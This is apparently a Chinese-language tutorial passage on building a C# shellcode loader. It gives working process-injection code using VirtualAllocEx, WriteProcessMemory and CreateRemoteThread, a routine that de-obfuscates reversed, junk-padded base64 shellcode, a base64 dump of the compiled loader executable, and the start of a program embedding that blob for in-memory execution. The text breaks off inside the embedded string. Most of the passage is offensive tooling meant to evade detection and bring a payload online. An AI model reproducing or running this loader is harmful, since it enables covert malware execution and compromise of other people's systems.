public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, pro.AllocationType flAllocationType, pro.MemoryProtection flProtect);WriteProcessMemory将数据写入指定进程中的内存区域
[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);CreateRemoteThread创建一个在另一个进程的虚拟地址空间中运行的线程
  1. [DllImport("kernel32.dll")]
  2. public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, pro.ThreadCreationFlags dwCreationFlags, out IntPtr lpThreadId);
复制代码

  1. using System;
  2. using System.Collections.Generic;
  3. using System.Diagnostics;
  4. using System.IO;
  5. using System.Linq;
  6. using System.Runtime.InteropServices;
  7. using System.Text;
  8. using System.Threading.Tasks;
  9. using static shellcodeLoader.pro;

  11. namespace shellcodeLoader
  12. {
  13.     class TargetProcessInject
  14.     {
  15.         [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
  16.         public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, pro.AllocationType flAllocationType, pro.MemoryProtection flProtect);
  17.         [DllImport("kernel32.dll")]
  18.         public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
  19.         [DllImport("kernel32.dll")]
  20.         public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, pro.ThreadCreationFlags dwCreationFlags, out IntPtr lpThreadId);

  22.         public static Process PickedProcessInfoByname(string name)
  23.         {
  24.             Process[] procs = Process.GetProcesses();
  25.             string targetname = "";
  26.             Process process = null;
  27.             foreach (Process proc in procs)
  28.             {
  29.                 try
  30.                 {
  31.                     if (proc.MainModule.FileName.Contains(name) || proc.ProcessName.Contains(name))
  32.                     {
  33.                         process = proc;
  34.                         targetname = proc.ProcessName;
  35.                         Console.WriteLine("[+]Name:" + targetname);
  36.                         Console.WriteLine("Path:" + proc.MainModule.FileName);
  37.                         Console.WriteLine("ID:" + proc.Id);
  38.                         Console.WriteLine();
  39.                         return process;
  40.                     }
  41.                 }
  42.                 catch
  43.                 {
  44.                     continue;
  45.                 }
  46.             }
  47.             return null;
  48.         }
  49.         public static void Inject(string processname)
  50.         {
  51.             byte[] shellcode = GetBase64Shellcode.GetShellcode();
  52.             Process process = PickedProcessInfoByname(processname);
  53.             if (process == null)
  54.             {
  55.                 Console.WriteLine("[-]没有找到目标进程");
  56.                 Console.WriteLine("[*]可以尝试去掉后缀,例如calc.exe去掉.exe查询");
  57.                 return;
  58.             }
  59.             IntPtr pAddr = VirtualAllocEx(process.Handle, IntPtr.Zero, (UInt32)shellcode.Length, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.PAGE_EXECUTE_READWRITE);
  60.             WriteProcessMemory(process.Handle, pAddr, shellcode, shellcode.Length, out IntPtr lpNumberOfBytesWritten);
  61.             IntPtr hThread = CreateRemoteThread(process.Handle, IntPtr.Zero, 0, pAddr, IntPtr.Zero, ThreadCreationFlags.NORMAL, out hThread);
  62.         }
  63.         public static void run()
  64.         {
  65.             Inject("1");
  66.         }
  67.         static void Main(string[] args)
  68.         {
  69.             run();
  70.         }
  71.     }
  72. }
复制代码

通过GetBase64Shellcode.GetShellcode()方法读取并且解密base64shellcode.txt里面的加密shellcode。GetShellcode()
  1. using System;
  2. using System.Collections.Generic;
  3. using System.IO;
  4. using System.Linq;
  5. using System.Text;
  6. using System.Threading.Tasks;

  8. namespace shellcodeLoader
  9. {
  10.     class GetBase64Shellcode
  11.     {
  12.         public static byte[] GetShellcode()
  13.         {
  14.             string Path = "base64shellcode.txt";
  15.             StreamReader sr = new StreamReader(Path, Encoding.Default);
  16.             string content;
  17.             string random_re_base64_text = "";
  18.             while ((content = sr.ReadLine()) != null)
  19.             {
  20.                 string base_ = content.ToString();
  21.                 random_re_base64_text += base_;
  22.             }
  23.             string re_base64_text = random_re_base64_text.Replace("abcdefg", "");
  24.             string base64_text = Reversal.ReversalString(re_base64_text);
  25.             byte[] shellcode = Convert.FromBase64String(base64_text);
  26.             return shellcode;
  27.         }
  28.     }
  29. }
复制代码


然后我们可以通过远程dump然后内存加载上线。
把loader通过刚才的方法进行base64加密。
  1. using System;
  2. using System.Collections.Generic;
  3. using System.IO;
  4. using System.Linq;
  5. using System.Text;
  6. using System.Threading.Tasks;

  8. namespace Tobase64
  9. {
  10.     class Program
  11.     {
  12.         static void Main(string[] args)
  13.         {
  14.             byte[] base64Buff = File.ReadAllBytes("shellcodeLoader.exe");
  15.             string base64string = Convert.ToBase64String(base64Buff);
  16.             Console.WriteLine(base64string);
  17.         }
  18.     }
  19. }
复制代码


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UEVOREVEAFBBR0VfR1VBUkQAUEFHRV9OT0NBQ0hFAFBBR0VfV1JJVEVDT01CSU5FAFBBR0VfUkVBRFdSSVRFAFBBR0VfRVhFQ1VURV9SRUFEV1JJVEUAUEFHRV9FWEVDVVRFAE5PUk1BTABOVUxMAFNUQUNLX1NJWkVfUEFSQU1fSVNfQV9SRVNFUlZBVElPTgBTeXN0ZW0uSU8AUEFHRV9OT0FDQ0VTUwBQQUdFX1JFQURPTkxZAFBBR0VfV1JJVEVDT1BZAFBBR0VfRVhFQ1VURV9XUklURUNPUFkAdmFsdWVfXwBtc2NvcmxpYgBnZXRfSWQAbHBUaHJlYWRJZABDcmVhdGVSZW1vdGVUaHJlYWQAUmVwbGFjZQBHZXRCYXNlNjRTaGVsbGNvZGUAR2V0U2hlbGxjb2RlAGdldF9IYW5kbGUAQ29uc29sZQBnZXRfTWFpbk1vZHVsZQBQcm9jZXNzTW9kdWxlAGdldF9GaWxlTmFtZQBnZXRfUHJvY2Vzc05hbWUAcHJvY2Vzc25hbWUAUGlja2VkUHJvY2Vzc0luZm9CeW5hbWUAUmVhZExpbmUAV3JpdGVMaW5lAGZsQWxsb2NhdGlvblR5cGUAUmVsZWFzZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBSZXNlcnZlAHNoZWxsY29kZUxvYWRlci5leGUAZHdTdGFja1NpemUAblNpemUAZHdTaXplAEVuY29kaW5nAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcARnJvbUJhc2U2NFN0cmluZwBSZXZlcnNhbFN0cmluZwBUb1N0cmluZwBXcml0ZVdhdGNoAGdldF9MZW5ndGgAUGh5c2ljYWwAUmV2ZXJzYWwAa2VybmVsMzIuZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dyaXR0ZW4ATWFpbgBTeXN0ZW0uUmVmbGVjdGlvbgBNZW1vcnlQcm90ZWN0aW9uAFJ1bgBUb3BEb3duAFplcm8AcHJvAENoYXIAU3RyZWFtUmVhZGVyAFRleHRSZWFkZXIAc2hlbGxjb2RlTG9hZGVyAGxwQnVmZmVyAGxwUGFyYW1ldGVyAC5jdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMATGFyZ2VQYWdlcwBHZXRQcm9jZXNzZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAFRocmVhZENyZWF0aW9uRmxhZ3MAZHdDcmVhdGlvbkZsYWdzAGFyZ3MAQ29udGFpbnMAZ2V0X0NoYXJzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRBZGRyZXNzAENvbmNhdABPYmplY3QAVGFyZ2V0UHJvY2Vzc0luamVjdABmbFByb3RlY3QAUmVzZXQAQ29tbWl0AERlY29tbWl0AGdldF9EZWZhdWx0AENvbnZlcnQAaW5wdXQAU3lzdGVtLlRleHQAVmlydHVhbEFsbG9jRXgAV3JpdGVQcm9jZXNzTWVtb3J5AAAnYgBhAHMAZQA2ADQAcwBoAGUAbABsAGMAbwBkAGUALgB0AHgAdAAAAQAPYQBiAGMAZABlAGYAZwAAEVsAKwBdAE4AYQBtAGUAOgAAC1AAYQB0AGgAOgAAB0kARAA6AAAXWwAtAF0AoWwJZ35iMFLudgdo248LegE9WwAqAF0A71PlTh1c1Yu7U4ljDlQAfywAi0+CWWMAYQBsAGMALgBlAHgAZQC7U4ljLgBlAHgAZQDlZ+KLAQUxADEAAAdyAHUAbgAAAAAAAwRCykVod0u9NNOa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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
然后通过前面load run方法
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Linq;
  4. using System.Reflection;
  5. using System.Text;
  6. using System.Threading.Tasks;

  8. namespace LoadExe
  9. {
  10.     class Program
  11.     {
  12.         static void Main(string[] args)
  13.         {
  14.             string base64string = @"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